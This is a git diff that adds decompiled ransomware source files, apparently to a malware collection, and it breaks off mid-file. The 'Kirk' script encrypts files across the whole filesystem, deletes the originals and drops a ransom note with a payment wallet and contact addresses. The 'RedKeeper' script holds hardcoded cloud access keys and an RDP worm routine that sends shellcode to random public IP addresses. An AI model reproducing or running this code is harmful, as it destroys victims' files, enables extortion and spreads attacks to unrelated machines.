random, string, time, threading, Queue, datetime +tn = datetime.datetime.now() +tn_2 = datetime.datetime.strftime(tn + datetime.timedelta(days=2), '%c') +tn_7 = datetime.datetime.strftime(tn + datetime.timedelta(days=7), '%c') +tn_14 = datetime.datetime.strftime(tn + datetime.timedelta(days=14), '%c') +tn_30 = datetime.datetime.strftime(tn + datetime.timedelta(days=30), '%c') +tn_31 = datetime.datetime.strftime(tn + datetime.timedelta(days=31), '%c') +tn = datetime.datetime.strftime(tn, '%c') +deltas = [ + tn_2, tn_7, tn_14, tn_30, tn_31] +TK_TITLE = 'Low Orbital Ion Cannon | When harpoons, air strikes and nukes fail | v1.0.1.0' +NOTE_NAME = 'RANSOM_NOTE.txt' +PWDF_NAME = 'pwd' +THREAD_NUM = 22 +queue = Queue.Queue() +files_to_enc = [] +pubkeyDat = '-----BEGIN PUBLIC KEY-----\nMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAoQpUk7lhDoenoPTCLRjG\nLStBjoT9owWl3HuYezrpmDt60t0P4/jlrwDC06POYxGpDDUbC2SfhcvbemFXWmX/\nzCM92h94v6sxfc6GOfKLbdwudSMOJ+TOSd7XGa3okcIbAh7bVR28XPBOGcg203Z/\n7YJh+wHHnjGjOxcUZIcM3X2BPDIEuc1jxgWgDEIMmjb+yi6m3YdtAmwmurV8wb61\njXrBY936IVxYc3sxw94x9GjfsIspmdurV5En1DEkXPORp7IU5q6Zj4ZZsLwyT+xX\n5V5MdWVYhOJV4X8pLPHUPjvAHQX1POGnX/DVlieG//RXOi0mnR+Vh4OjvBsXC10V\nqrQgZZXByHOtjrdfXgZH8Izr+KuyTVRGILvj884EZ1DMI6L4sb4F9EUjcRacO/tU\nRdduUTw3Q5qsbLPQiS/V4MBEQswlH7UVMiWxfNymyvM5I3BfFeW2QwauRGH5xmaD\nsQG0Yy/AsPzvHKqoShP/LepO1bYUdUodvnfVbChPGTYzZrwmnixS/m5AxyhUh/Ex\n3cxZ5raJWnBfx72wsviuAPIrXqyzlTlNo6aPX029Oh52ezk4uYwLpN02IjJ6yUEg\nyFkqbhASCtvYjqAprvCheane2j7+U7RnjZ+jLNgMWSc5M1pdGK4YYT+U3yfWqbdG\nRSie6e+LhifKADqjHeXSAVsCAwEAAQ==\n-----END PUBLIC KEY-----' +pk = RSA.importKey(pubkeyDat) +rp = None +UNDOC_EXTS = [ + 'cfr', 'ytd', 'sngw', 'tst', 'skudef', 'dem', 'sims3pack', 'hbr', + 'hkx', 'rgt', 'ggpk', 'ttarch2', 'hogg', 'spv', 'bm2', 'lua', 'dff', + 'save', 'rgssad', 'scm', 'aud', 'rxdata', 'mcmeta', 'bin', 'mpqe', + 'rez', 'xbe', 'grle', 'bf', 'iwd', 'vpp_pc', 'scb', 'naz', 'm2', 'xpk', + 'sabs', 'nfs13save', 'gro', 'emi', 'wad', '15', 'vfs', 'drs', 'taf', 'm4s', + 'player', 'umv', 'sgm', 'ntl', 'esm', 'qvm', 'arch00', 'tir', 'bk', 'sabl', + 'bin', 'opk', 'vfs0', 'xp3', 'tobj', 'rcf', 'sga', 'esf', 'rpack', 'DayZProfile', + 'qsv', 'gam', 'bndl', 'u2car', 'psk', 'gob', 'lrf', 'lts', 'iqm', 'i3d', 'acm', + 'SC2Replay', 'xfbin', 'db0', 'fsh', 'dsb', 'cry', 'osr', 'gcv', 'blk', '4', 'lzc', + 'umod', 'w3x', 'mwm', 'crf', 'tad', 'pbn', '14', 'ppe', 'ydc', 'fmf', 'swe', 'nfs11save', + 'tgx', 'trf', 'atlas', '20', 'game', 'rw', 'rvproj2', 'sc1', 'ed', 'lsd', 'pkz', 'rim', + 'bff', 'gct', '9', 'fpk', 'pk3', 'osf', 'bns', 'cas', 'lfl', 'rbz', 'sex', 'mrm', 'mca', + 'hsv', 'vpt', 'pff', 'i3chr', 'tor', '01', 'utx', 'kf', 'dzip', 'fxcb', 'modpak', 'ydr', + 'frd', 'bmd', 'vpp', 'gcm', 'frw', 'baf', 'edf', 'w3g', 'mtf', 'tfc', 'lpr', 'pk2', 'cs2', + 'fps', 'osz', 'lnc', 'jpz', 'tinyid', 'ebm', 'i3exec', 'ert', 'sv4', 'cbf', 'oppc', 'enc', + 'rmv', 'mta', 'otd', 'pk7', 'gm', 'cdp', 'cmg', 'ubi', 'hpk', 'plr', 'mis', 'ids', + 'replay_last_battle', 'z2f', 'map', 'ut4mod', 'dm_1', 'p3d', 'tre', 'package', 'streamed', + 'l2r', 'xbf', 'wep', 'evd', 'dxt', 'bba', 'profile', 'vmt', 'rpf', 'ucs', 'lab', 'cow', 'ibf', + 'tew', 'bix', 'uhtm', 'txd', 'jam', 'ugd', '13', 'dc6', 'vdk', 'bar', 'cvm', 'wso', 'xxx', 'zar', + 'anm', '6', 'ant', 'ctp', 'sv5', 'dnf', 'he0', 'mve', 'emz', 'e4mod', 'gxt', 'bag', 'arz', 'tbi', + 'itp', 'i3animpack', 'vtf', 'afl', 'ncs', 'gaf', 'ccw', 'tsr', 'bank', 'lec', 'pk4', 'psv', + 'los', 'civ5save', 'rlv', 'nh', 'sco', 'ims', 'epc', 'rgm', 'res', 'wld', 'sve', 'db1', 'dazip', + 'vcm', 'rvm', 'eur', 'me2headmorph', 'azp', 'ags', '12', 'slh', 'cha', 'wowsreplay', 'dor', + 'ibi', 'bnd', 'zse', 'ddsx', 'mcworld', 'intr', 'vdf', 'mtr', 'addr', 'blp', 'mlx', 'd2i', '21', + 'tlk', 'gm1', 'n2pk', 'ekx', 'tas', 'rav', 'ttg', 'spawn', 'osu', 'oac', 'bod', 'dcz', 'mgx', + 'wowpreplay', 'fuk', 'kto', 'fda', 'vob', 'ahc', 'rrs', 'ala', 'mao', 'udk', 'jit', '25', 'swar', + 'nav', 'bot', 'jdf', '32', 'mul', 'szs', 'gax', 'xmg', 'udm', 'zdk', 'dcc', 'blb', 'wxd', 'isb', + 'pt2', 'utc', 'card', 'lug', 'JQ3SaveGame', 'osk', 'nut', 'unity', 'cme', 'elu', 'db7', 'hlk', + 'ds1', 'wx', 'bsm', 'w3z', 'itm', 'clz', 'zfs', '3do', 'pac', 'dbi', 'alo', 'gla', 'yrm', 'fomod', + 'ees', 'erp', 'dl', 'bmd', 'pud', 'ibt', '24', 'wai', 'sww', 'opq', 'gtf', 'bnt', 'ngn', 'tit', 'wf', + 'bnk', 'ttz', 'nif', 'ghb', 'la0', 'bun', '11', 'icd', 'z3', 'djs', 'mog', '2da', 'imc', 'sgh', 'db9', + '42', 'vis', 'whd', 'pcc', '43', 'ldw', 'age3yrec', 'pcpack', 'ddt', 'cok', 'xcr', 'bsp', 'yaf', + 'swd', 'tfil', 'lsd', 'blorb', 'unr', 'mob', 'fos', 'cem', 'material', 'lfd', 'hmi', 'md4', 'dog', + '256', 'eix', 'oob', 'cpx', 'cdata', 'hak', 'phz', 'stormreplay', 'lrn', 'spidersolitairesave-ms', + 'anm', 'til', 'lta', 'sims2pack', 'md2', 'pkx', 'sns', 'pat', 'tdf', 'cm', 'mine', 'rbn', 'uc', 'asg', + 'raf', 'myp', 'mys', 'tex', 'cpn', 'flmod', 'model', 'sfar', 'fbrb', 'sav2', 'lmg', 'tbc', 'xpd', + 'bundledmesh', 'bmg', '18', 'gsc', 'shader_bundle', 'drl', 'world', 'rwd', 'rwv', 'rda'] +REAL_EXTS = [ + '.3g2', '.3gp', '.asf', '.asx', '.avi', '.flv', '.ai', + '.m2ts', '.mkv', '.mov', '.mp4', '.mpg', '.mpeg', 'mpeg4', + '.rm', '.swf', '.vob', '.wmv', '.doc', '.docx', '.pdf', + '.rar', '.jpg', '.jpeg', '.png', '.tiff', '.zip', '.7z', '.dif.z', + '.exe', '.tar.gz', '.tar', '.mp3', '.sh', '.c', '.cpp', + '.h', '.mov', '.gif', '.txt', '.py', '.pyc', '.jar', '.csv', + '.psd', '.wav', '.ogg', '.wma', '.aif', '.mpa', '.wpl', '.arj', + '.deb', '.pkg', '.db', '.dbf', '.sav', '.xml', '.html', '.aiml', + '.apk', '.bat', '.bin', '.cgi', '.pl', '.com', '.wsf', '.bmp', + '.bmp', '.gif', '.tif', '.tiff', '.htm', '.js', '.jsp', '.php', + '.xhtml', '.cfm', '.rss', '.key', '.odp', '.pps', '.ppt', '.pptx', + '.class', '.cd', '.java', '.swift', '.vb', '.ods', '.xlr', '.xls', + '.xlsx', '.dot', '.docm', '.dotx', '.dotm', '.wpd', '.wps', '.rtf', + '.sdw', '.sgl', '.vor', '.uot', '.uof', '.jtd', '.jtt', '.hwp', '.602', + '.pdb', '.psw', '.xlw', '.xlt', '.xlsm', '.xltx', '.xltm', '.xlsb', + '.wk1', '.wks', '.123', '.sdc', '.slk', '.pxl', '.wb2', '.pot', '.pptm', + '.potx', '.potm', '.sda', '.sdd', '.sdp', '.cgm', '.wotreplay', '.rofl', + '.pak', '.big', '.bik', '.xtbl', '.unity3d', '.capx', '.ttarch', '.iwi', + '.rgss3a', '.gblorb', '.xwm', '.j2e', '.mpk', '.xex', '.tiger', '.lbf', + '.cab', '.rx3', '.epk', '.vol', '.asset', '.forge', '.lng', '.sii', '.litemod', + '.vef', '.dat', '.papa', '.psark', '.ydk', '.mpq', '.wtf', '.bsa', '.re4', + '.dds', '.ff', '.yrp', '.pck', '.t3', '.ltx', '.uasset', '.bikey', '.patch', + '.upk', '.uax', '.mdl', '.lvl', '.qst', '.ddv', '.pta'] +INIT_EXTS = [] + REAL_EXTS +for ue in UNDOC_EXTS: + INIT_EXTS.append('.' + ue) +seen = [] +ALL_EXTS = [] +for re in INIT_EXTS: + if re in seen: + pass + else: + ALL_EXTS.append(re) + seen.append(re) +cols = 9 +if len(REAL_EXTS) % cols != 0: + for ec in range(cols - len(REAL_EXTS) % cols): + REAL_EXTS.append(' ') +split = [ REAL_EXTS[i:i + len(REAL_EXTS) / cols] for i in range(0, len(REAL_EXTS), len(REAL_EXTS) / cols) ] +PRETTY_EXTS = '' +for row in zip(*split): + PRETTY_EXTS += '\n ' + ('').join((str.ljust(i, 10) for i in row)) +R_NOTE = ('\n :xxoc;;,.. .\n cWW0olkNMMMKdl;. .;llxxklOc,\'\n oWMKxd, .,lxNKKOo;. :xWXklcc;. ...\'.\n k lMMNl . ON. :c. \'\'. \':....\n .WXc ;WMMMXNNXKKxdXMM. . .\n .NdoK: XMMMMMMMMMMMMMMM;oo; ...;,cxxxll. .\n .WX.K0\'WMMMWMMMMMWMNXWMooMWNO\' ..,;OKNWWWWMMMMMXk:.\n KK:xKKWMMMXNMMMMW; .. :WNKd, .. .\'cdOXKXNNNNNWWMMMMMMMW0,\n lNMXXMMMMMMMMWWMMWKk, ;0k\' .,cxxk0K0O0XXWWMMMMMMMMMMMMMMX:.. ..\n ..,;XMMMMMMMWXWWK0KK: .;. .:lddddxOOO0XWMMMMMMMMMMMMMMMMMMO. .,\n .kKXMMMMMWkoxolcc;.. .\':loodxO00OO0NNXNWMMMMMMMMMMMMMMMN; \'.\n .MK;kWMMMWWKOc. . ..\';cdxkKNX0kOOOKNMMMMMMMMMMMMMMMMMW: .\n ,MW:,:x0NMMMMWW0x\' ..,:dXNWW0xkkKWMMMMMMMMMMMMMMMMMMWk. ..\n oMMN; ;odoccc;c:. ...lXWWMOok0NMMMMMWNXKXKXWMMMMMMMOc.\n XMMMX, ....\';lldkWkodK0loc\'. .\'lxx0kOKNMMMXo.\n \'XMMMMMNc .dldXWx. ..,,coOXOkXMMMK,\n ,. .:dk0KNWMk. ... .kWMK,. ..:c .:.. .0MWMMMMO.\n .\':x0K0:. .. . . .OWMNNXO:cccdxKXWMW0o0WWMMMM;.\n 00000000000kdl:,\'. ..\'o00l \'KMMNKNWWNKXWWMMMMMMMMMMMMMM0.\n 0000000000000000000Oxl:\' .;xKWWx .xNMMMWNMMMMMMMMMMMMMMMMMMMMMMl\n 0000000000000000000000000x;. ..,::,. .ck0KKk\' \'0WMMMMMMMWWMMMMMMMMMMMMMMMMMM0. .\'\n 0000000000000000000000000000Oxdllc:;,....,\'... .cdkOko: ,cOKKXWMMMKd0WMMMMMMMMMMMMMWW0. \'Kc:,\n 000000000000000000000000000000000OkkkxdoodxOkoooool .;okOx, .,\'...cKMXl\'oKWMMMMMMMWWNXN0 \'MMc0.\n 0000OO000000000000000000000000000000000000000kc. .:dk0c ,KNKxdKMMM0;;kMMMMMMMMWNKXO ,kW0xl\n OdloxO000000000000000000000000000000000000000000x, .,ll; .lokKWMMMMMMMMM0xNMMMMMMMNXXNo.xK;cXKx\n lx000000000000000000000000000000000000000000000000l .\'.. .\'cKWXOXMMMMMMMMMMMMMMMMMWWNXXNKX0MNkNK0..\n 00000000000000000000000000000000000000000000000000O .. ..,;ok0X000KKXWMNNMMMMMMMMNNXKKXX00MMMWWc\',\n 00000000000000000000000000000000000000000000000000d .. ..........;;.cKMMMMMWNXKKXNKxkNMMX,\n 000000000000000000000000000000000000000Ko.0000000Ol .\'::odkkOOOxxxoxNMMMMNNWNXKK0k..;\'\n 0000000000000000000000000000000000000000..:000000kl .:coododkXWMMMMMMMWWMMMNNNNNKOkkx:\n :;ok00000000000000000000000000000000000O.;.d00000dc ... .........cONMMMMMMMMMNXXXN0dlddxN.\n .dk000000000000000000000000000000000000;ld,.O00kocc .. ...,;::lokKNMMMMMMMMWKOO0OxloocxM:\n OO0000000000000000000000000000000000000ol0Koc0xc:ll . ..;lxO0XNNMMMMMMMMMMMN0xoxOdl::,;0Md\n :;,\'..;loxk000000000000000000000000000000000lx..loo ,0 .\'\';lkKKNMMMMMMMMMNOd:;lc:;\'..,kWMK\n cccldxkkkO00Okdooddxk00000000000000000000000Oc\'lddl dK, .\':ollokOOOOOOOc\'.........lXMMMM,\n 000000kdoc,....;cldkO0000000000000000000000Okdodddo\'K0\'. ....... .oKMMMMMM0\n :,\'....\',;:ldkO0000000000000000000000000000Okxodddd;Xk,... .l0NMMMMMMMM:\n OO000000000000000000000000000000000000000000OkodxxxoXo,,,.. .:kKWMMMMMMMMMW\'\n dO0000000000000000000000000000000000000000000OodxxxkKl;,,,, \'dOKWMMMMMMMMMMMX\n\n _ _____ ____ _ __ ____ _ _ _ ____ ___ __ ____ ___ ____ _____ \n | |/ /_ _| _ \\| |/ / | _ \\ / \\ | \\ | / ___| / _ \\| \\/ \\ \\ / / \\ | _ \\| ____|\n | \' / | || |_) | \' / | |_) | / _ \\ | \\| \\___ \\| | | | |\\/| |\\ \\ /\\ / / _ \\ | |_) | _| \n | . \\ | || _ <| . \\ | _ < / ___ \\| |\\ |___) | |_| | | | | \\ V V / ___ \\| _ <| |___ \n |_|\\_\\___|_| \\_\\_|\\_\\ |_| \\_\\/_/ \\_\\_| \\_|____/ \\___/|_| |_| \\_/\\_/_/ \\_\\_| \\_\\_____|\n\n\nOh no! The Kirk ransomware has encrypted your files!\n\n\n-----------------------------------------------------------------------------------------------------\n\n> ! IMPORTANT ! READ CAREFULLY:\n\nYour computer has fallen victim to the Kirk malware and important files have been encrypted - locked\nup so they don\'t work. This may have broken some software, including games, office suites etc.\n\nHere\'s a list of some the file extensions that were targetted:\n{}\n\nThere are an additional {} file extensions that are targetted. They are mostly to do with games.\n\nTo get your files back, you need to pay. Now. Payments recieved more than 48 hours after the time of\ninfection will be charged double. Further time penalties are listed below. The time of infection has\nbeen logged.\n\nAny files with the extensions listed above will now have the extra extension \'.kirked\', these files\nare encrypted using military grade encryption.\n\nIn the place you ran this program from, you should find a note (named {}) similar to this one.\nYou will also find a file named \'{}\' - this is your encrypted password file. Although it was\ngenerated by your computer, you have no way of ever decrypting it. This is due to the security\nof both the way it was generated and the way it was encrypted. Your files were encrypted using\nthis password.\n\n ____ ____ ___ ____ _ __ _____ ___ _____ _ _ _____ ____ _____ ____ ____ _ _ _____ _ \n/ ___|| _ \\ / _ \\ / ___| |/ / |_ _/ _ \\ |_ _| | | | ____| | _ \\| ____/ ___| / ___| | | | ____| |\n\\___ \\| |_) | | | | | | \' / | || | | | | | | |_| | _| | |_) | _| \\___ \\| | | | | | _| | |\n ___) | __/| |_| | |___| . \\ | || |_| | | | | _ | |___ | _ <| |___ ___) | |___| |_| | |___|_|\n|____/|_| \\___/ \\____|_|\\_\\ |_| \\___/ |_| |_| |_|_____| |_| \\_\\_____|____/ \\____|\\___/|_____(_)\n\n "Logic, motherfucker." ~ Spock.\n\n\nDecrypting your files is easy. Take a deep breath and follow the steps below.\n\n 1 ) Make the proper payment.\n Payments are made in Monero. This is a crypto-currency, like bitcoin.\n You can buy Monero, and send it, from the same places you can any other\n crypto-currency. If you\'re still unsure, google \'bitcoin exchange\'.\n\n Sign up at one of these exchange sites and send the payment to the address below.\n\n Make note of the payment / transaction ID, or make one up if you have the option.\n\n Payment Address (Monero Wallet):\n 4AqSwfTexbNaHcn8giSJw3KPiWYHGBaCF9bdgPxvHbd5A8Q3Fc7n6FQCReEns8uEg8jUo4BeB79rwf4XSfQPVL1SKdVp2jz\n\n Prices:\n Days : Monero : Offer Expires\n 0-2 : 50 : {}\n 3-7 : 100 : {}\n 8-14 : 200 : {}\n 15-30 : 500 : {}\n\n Note: In 31 days your password decryption key gets permanently deleted.\n You then have no way to ever retrieve your files. So pay now.\n\n 2 ) Email us.\n Send your pwd file as an email attachment to one of the email addresses below.\n Include the payment ID from step 1.\n\n Active email addresses:\n kirk.help@scryptmail.com\n kirk.payments@scryptmail.com\n\n 3 ) Decrypt your files.\n You will recieve your decrypted password file and a program called \'Spock\'.\n Download these both to the same place and run Spock.\n Spock reads in your decrypted password file and uses it to decrypt all of the\n affected files on your computer.\n\n > IMPORTANT !\n The password is unique to this infection.\n Using an old password or one from another machine will result in corrupted files.\n Corrupted files cannot be retrieved.\n Don\'t fuck around.\n\n 4 ) Breathe.\n\n\n _ _____ _______ _ ___ _ _ ____ \n | | |_ _\\ \\ / / ____| | | / _ \\| \\ | |/ ___|\n | | | | \\ \\ / /| _| | | | | | | \\| | | _ \n | |___ | | \\ V / | |___ | |__| |_| | |\\ | |_| |\n |_____|___| \\_/ |_____| |_____\\___/|_| \\_|\\____|\n _ _ _ ____ ____ ____ ___ ____ ____ _____ ____ \n / \\ | \\ | | _ \\ | _ \\| _ \\ / _ \\/ ___|| _ \\| ____| _ \\ \n / _ \\ | \\| | | | | | |_) | |_) | | | \\___ \\| |_) | _| | |_) |\n / ___ \\| |\\ | |_| | | __/| _ <| |_| |___) | __/| |___| _ < \n /_/ \\_\\_| \\_|____/ |_| |_| \\_\\\\___/|____/|_| |_____|_| \\_\\\n\n\n\n').format(PRETTY_EXTS, len(UNDOC_EXTS), NOTE_NAME, PWDF_NAME, tn_2, tn_7, tn_14, tn_30) + +def select_files(): + global queue + ext = ALL_EXTS + for root, dirs, files in os.walk('/'): + for file in files: + if file.lower().endswith(tuple(ext)): + queue.put(os.path.join(root, file)) + +class Worker(threading.Thread): + def __init__(self, queue): + threading.Thread.__init__(self) + self.queue = queue + + def run(self): + while True: + qItem = self.queue.get() + try: + self.encrypt(qItem) + with open(qItem, 'wb'): + pass + try: + os.remove(qItem) + except Exception as ex: + pass + except Exception as ex: + pass + self.queue.task_done() + + def encrypt(self, filename): + global rp + chunk_size = 65536 + outputFile = filename + '.kirked' + filesize = str(os.path.getsize(filename)).zfill(16) + IV = '' + for i in range(16): + IV += chr(random.randint(0, 255)) + encryptor = AES.new(rp, AES.MODE_CBC, IV) + with open(filename, 'rb') as (infile): + with open(outputFile, 'wb') as (outfile): + outfile.write(filesize) + outfile.write(IV) + while True: + chunk = infile.read(chunk_size) + if len(chunk) == 0: + break + else: + if len(chunk) % 16 != 0: + chunk += ' ' * (16 - len(chunk) % 16) + outfile.write(encryptor.encrypt(chunk)) + +def drop_note(): + with open(NOTE_NAME, 'wb+') as (rnf): + rnf.write(R_NOTE) + +def Main(): + global rp + orp = tn + ('').join((random.choice(string.ascii_uppercase + string.ascii_lowercase + string.digits) for _ in range(64))) + rp = SHA256.new(orp).digest() + if rp == None: + quit() + try: + with open(PWDF_NAME, 'wb') as (pwdf): + encp = pk.encrypt(orp, 32)[0] + pwdf.write(encp) + except Exception: + pass + for i in range(THREAD_NUM): + w = Worker(queue) + w.setDaemon(True) + w.start() + tkMessageBox.showinfo(TK_TITLE, 'The LOIC is initializing for your system ...\nThis may take some time') + select_files() + queue.join() + drop_note() + root = tk.Tk() + root.title('Kirk') + scrollbar = tk.Scrollbar(root) + scrollbar.pack(side=tk.RIGHT, fill=tk.Y) + T = tk.Text(root, height=50, width=110, background='black', foreground='white', yscrollcommand=scrollbar.set) + T.pack(side=tk.LEFT) + T.insert(tk.END, R_NOTE) + T.config(state='disabled') + scrollbar.config(command=T.yview) + root.update() + root.mainloop() + return + +if __name__ == '__main__': + try: + with open('pwd', 'r') as (test_pwdf): + tkMessageBox.showinfo('Kirk', 'We recommend that you do NOT run this again') + quit() + except Exception as ex: + pass + Main() diff --git a/Python/RedKeeper-ransomware_source.py b/Python/RedKeeper-ransomware_source.py new file mode 100644 index 00000000..372b8857 --- /dev/null +++ b/Python/RedKeeper-ransomware_source.py @@ -0,0 +1,220 @@ +# uncompyle6 version 2.11.5 +# Python bytecode 2.7 (62211) +# Decompiled from: Python 2.7.16 (default, Apr 12 2019, 15:32:40) +# [GCC 4.2.1 Compatible Apple LLVM 10.0.1 (clang-1001.0.46.3)] +# Embedded file name: redkeeper.py +# Compiled at: 2018-09-20 11:31:08 +from os.path import expanduser +import socket +import glob +import os +from random import randint, choice +import struct +import string +from Crypto.Cipher import AES +from Crypto.Hash import SHA256 +from Crypto import Random +import requests +import sys +aws_access_key_id = 'AKIA35OHX2DSKHT73VPQ' +aws_secret_access_key = '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' + +def pdu_connect_initial(hostname): + host_name = '' + for i in hostname: + host_name += struct.pack('<h', ord(i)) + + host_name += '\x00' * (32 - len(host_name)) + mcs_gcc_request = '\x03\x00\x01\xca\x02\xf0\x80\x7fe\x82\x01\xbe\x04\x01\x01\x04\x01\x01\x01\x01\xff0 \x02\x02\x00"\x02\x02\x00\x02\x02\x02\x00\x00\x02\x02\x00\x01\x02\x02\x00\x00\x02\x02\x00\x01\x02\x02\xff\xff\x02\x02\x00\x020 \x02\x02\x00\x01\x02\x02\x00\x01\x02\x02\x00\x01\x02\x02\x00\x01\x02\x02\x00\x00\x02\x02\x00\x01\x02\x02\x04 \x02\x02\x00\x020 \x02\x02\xff\xff\x02\x02\xfc\x17\x02\x02\xff\xff\x02\x02\x00\x01\x02\x02\x00\x00\x02\x02\x00\x01\x02\x02\xff\xff\x02\x02\x00\x02\x04\x82\x01K\x00\x05\x00\x14|\x00\x01\x81B\x00\x08\x00\x10\x00\x01\xc0\x00Duca\x814\x01\xc0\xd8\x00\x04\x00\x08\x00 \x03X\x02\x01\xca\x03\xaa\t\x04\x00\x00(\n\x00\x00' + mcs_gcc_request += host_name + mcs_gcc_request += '\x04\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xca\x01\x00\x00\x00\x00\x00\x18\x00\x07\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\xc0\x0c\x00\t\x00\x00\x00\x00\x00\x00\x00\x02\xc0\x0c\x00\x03\x00\x00\x00\x00\x00\x00\x00\x03\xc0D\x00\x04\x00\x00\x00' + channel_name = [ + 'NEVER\x00\x00\x00\x00\x00\x00\x00', 'GONNA\x00\x00\x00\x00\x00\x00\x00', 'GIVE\x00\x00\x00\x00\x00\x00\x00\x00', 'YOU\x00\x00\x00\x00\x00\x00\x00\x00\x00', 'UP\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'] + mcs_gcc_request += choice(channel_name) + mcs_gcc_request += 'MS_T120\x00\x00\x00\x00\x00rdpsnd\x00\x00\xc0\x00\x00\x00snddbg\x00\x00\xc0\x00\x00\x00rdpdr\x00\x00\x00\x80\x80\x00\x00' + return mcs_gcc_request + + +def worm(target): + uname = [ + '@e_kaspersky', '@briankrebs', '@kevinmitnick'] + hname = ['talso', 'sphos', 'startgame', 'mcoffee', 'slowseven', 'selloutvault', 'stratforkoff'] + username = choice(uname) + hostname = choice(hname) + try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.settimeout(2) + s.connect((target, 3389)) + except Exception as e: + s.close() + return + + x_224_conn_req = '\x03\x00\x00{0}' + x_224_conn_req += chr(33 + len(username)) + x_224_conn_req += '\xe0' + x_224_conn_req += '\x00\x00' + x_224_conn_req += '\x00\x00' + x_224_conn_req += '\x00' + x_224_conn_req += 'Cookie: mstshash=' + x_224_conn_req += username + x_224_conn_req += '\r\n' + x_224_conn_req += '\x01' + x_224_conn_req += '\x00' + x_224_conn_req += '\x08\x00' + x_224_conn_req += '\x00\x00\x00\x00' + try: + s.sendall(x_224_conn_req.format(chr(33 + len(username) + 5))) + s.recv(8192) + s.sendall(pdu_connect_initial(hostname)) + res = s.recv(10000) + except Exception as e: + s.close() + return + + shellcode = '1\xc9' + shellcode += 'd\x8bq0' + shellcode += '\x8bv\x0c' + shellcode += '\x8bv\x1c' + shellcode += '\x8b6' + shellcode += '\x8b\x06' + shellcode += '\x8bh\x08' + shellcode += '\xeb ' + shellcode += '[' + shellcode += 'S' + shellcode += 'U' + shellcode += '[' + shellcode += '\x81\xeb\x11\x11\x11\x11' + shellcode += '\x81\xc3\xda?\x1a\x11' + shellcode += '\xff\xd3' + shellcode += '\x81\xc3\x11\x11\x11\x11' + shellcode += '\x81\xeb\x8c\xcc\x18\x11' + shellcode += '\xff\xd3' + shellcode += '\xe8\xdb\xff\xff\xff' + shellcode += 'cmd' + try: + s.sendall(shellcode) + s.close() + except Exception as e: + s.close() + return + + +def drop_note(img): + bdy = ['You wil have to pay us before you git him from us, and pay us a big cent to, if you put the cops hunting for him you is only defeeting yu own end.', 'If you install this on a microcomputer... then under terms of this license you agree to pay PC Cyborg Corporation in full for the cost of leasing these programs...In the case of your breach of this license agreement, PC Cyborg reserves the right to take legal action necessary to recover any outstanding debts payable to PC Cyborg Corporation and to use program mechanisms to ensure termination of your use...These program mechanisms will adversely affect other program applications...You are hereby advised of the most serious consequences of your failure to abide by the terms of this license agreement; your conscience may haunt you for the rest of your life...and your PC will stop functioning normally... You are strictly prohibited from sharing this product with others...', 'A company can spend hundreds of thousands of dollars on firewalls, intrusion detection systems and encryption and other security technologies, but if an attacker can call one trusted person within the company, and that person complies, and if the attacker gets in, then all that money spent on technology is essentially wasted.', 'You cannot arrest an idea', 'Most hackers are young because young people tend to be adaptable. As long as you remain adaptable, you can always be a good hacker.', 'All right hes in the personal ads. Disappointed white male. Cross dresser looking for discreet friend to bring dreams to realiy. Leather, lace and water sports. Transvestites welcome.'] + footer = "Your files have been encrypted. To decrypt your files send 1,000,000 satoshi (Don't you think we should ask more than 1 million satoshi ?) to address 19GL2cUrn1Xx8XD6VaL25SYAzQd6qnwVb7 " + special = 'If you like to be a hero when balance is over 100,000,000 satoshi kill switch activates !?! ' + note = img + '\n\n\n' + choice(bdy) + '\n\n\n' + footer + '\n\n\n' + special + f = open('RTFM.txt', 'a+') + f.write(note) + f.close() + try: + os.startfile('RTFM.txt') + except Exception as e: + print 'Failed to open note {}'.format(e) + + +def check_domz(switch): + try: + socket.gethostbyname(switch) + except socket.gaierror: + return False + + return True + + +def getKey(password): + hasher = SHA256.new(password.encode('utf-8')) + return hasher.digest() + + +def encrypt(key, filename): + chunksize = 65536 + outputFile = '(encrypted)' + filename + filesize = str(os.path.getsize(filename)).zfill(16) + IV = Random.new().read(16) + encryptor = AES.new(key, AES.MODE_CBC, IV) + with open(filename, 'rb') as infile: + with open(outputFile, 'wb') as outfile: + outfile.write(filesize.encode('utf-8')) + outfile.write(IV) + while True: + chunk = infile.read(chunksize) + if len(chunk) == 0: + break + elif len(chunk) % 16 != 0: + chunk += '*(16 \xe2\x80\x93 (len(chunk) % 16))' + outfile.write(encryptor.encrypt(chunk)) + + +def encrypt_files(): + extension = [ + 'WNCRY', 'PCCyborg', 'NEVER', 'GONNA', 'GIVE', 'YOU', 'UP'] + encrypt_key = 'TESTTESTTESTTEST' + os.chdir(expanduser('~\\Desktop')) + files_grabbed = [ glob.glob(e) for e in ['*.txt', '*.doc', '*.png', '*.jpg', '.*rtf'] ] + for files in files_grabbed: + for fil in files: + f1 = open(fil, 'r') + f1.close() + fname = fil + '.' + choice(extension) + f = open(fname, 'a+') + f.write(nyan) + f.close() + + +def self_replicate(): + pass + + +def get_local_ip(): + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect(('1.3.3.7', 1)) + local_ip_address = s.getsockname()[0] + s.close() + return local_ip_address + + +def get_worm_public_target(): + octets = [] + for x in range(4): + octets.append(str(randint(0, 255))) + + return '.'.join(octets) + + +if __name__ == '__main__': + switch = 'iuqerfsodp9ifjaposdfjhgosurijfaewrwergwe' + choice(string.ascii_lowercase) + '.com' + nyan = 